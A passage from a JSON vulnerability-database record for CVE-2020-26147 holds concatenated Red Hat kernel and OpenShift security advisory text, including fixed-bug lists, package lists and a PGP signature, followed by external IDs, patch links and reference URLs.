CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. \n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack  the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should  be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-26147",
        "trust": 4.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/11/12",
        "trust": 2.5
      },
      {
        "db": "SIEMENS",
        "id": "SSA-913875",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU93485736",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-104-04",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163249",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163599",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166101",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2290",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2249",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1628",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4254",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2079",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3905",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3825",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2453",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1225",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2876",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1715",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2216",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-236-01",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163291",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166417",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "164875",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-61212",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031521",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021100407",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051915",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051212",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051814",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26147",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163251",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163255",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163301",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164967",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "id": "VAR-202105-1475",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5
  },
  "last_update_date": "2024-07-23T19:36:31.857000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SSA-913875 NEC NEC Product security information",
        "trust": 0.8,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/12602-security-advisory-63"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=153852"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-26147 log"
      },
      {
        "title": "Ubuntu Security Notice: USN-5299-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5299-1"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-004",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-004"
      },
      {
        "title": "Ubuntu Security Notice: USN-5343-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5343-1"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in Frame Aggregation and Fragmentation Implementations of 802.11 Specification Affecting Cisco Products: May 2021",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-wifi-faf-22epcewu"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-002",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-002"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/kali973/fragattacks "
      },
      {
        "title": "fragattacks",
        "trust": 0.1,
        "url": "https://github.com/vanhoefm/fragattacks "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "others (CWE-Other) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/11/12"
      },
      {
        "trust": 2.3,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-wifi-faf-22epcewu"
      },
      {
        "trust": 1.7,
        "url": "https://www.fragattacks.com"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/vanhoefm/fragattacks/blob/master/summary.md"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-913875.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/12602-security-advisory-63"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu93485736/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.6,
        "url": "https://www.qualcomm.com/company/product-security/bulletins/august-2021-bulletin"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-61212"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2876"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-10-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1628"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-104-04"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021100407"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-236-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051814"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166101/ubuntu-security-notice-usn-5299-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/wi-fi-devices-multiple-vulnerabilities-via-fragattacks-35386"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051915"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051212"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-wearables-202111-0000001172568432"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1225"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166417/ubuntu-security-notice-usn-5343-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163599/ubuntu-security-notice-usn-5018-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2079"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2453"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2290"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-notices/huawei-sn-20210513-01-fragattacks-cn"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1715"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031521"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24504"
      },
      {
        "trust": 0.3,
